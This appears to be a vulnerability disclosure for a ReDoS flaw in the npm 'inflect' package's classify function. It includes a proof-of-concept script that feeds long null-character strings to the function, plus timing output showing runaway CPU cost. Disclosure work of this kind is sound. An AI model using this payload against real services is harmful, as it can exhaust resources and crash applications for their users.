The inflect
package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted table_name as input to the classify function may cause an application to consume an excessive amount of CPU.
Below pinned line using vulnerable regex.
Put the below in a poc.js file and run with node
//poc.js
var inflect = require('i')();
for(var i = 1; i <= 500; i++) {
var time = Date.now();
var payload = ""+"\u0000".repeat(i*10000)+"\u0000"
inflect.classify(payload)
var time_cost = Date.now() - time;
console.log("Classify time : " + payload.length + ": " + time_cost+" ms");
}
Check the Output:
Classify time : 10001: 158 ms
Classify time : 20001: 565 ms
Classify time : 30001: 1282 ms
Classify time : 40001: 2129 ms
Classify time : 50001: 3369 ms
Classify time : 60001: 8430 ms
Classify time : 70001: 15926 ms
Classify time : 80001: 16221 ms
--
--
This vulnerability is capable of exhausting system resources and leads to crashes.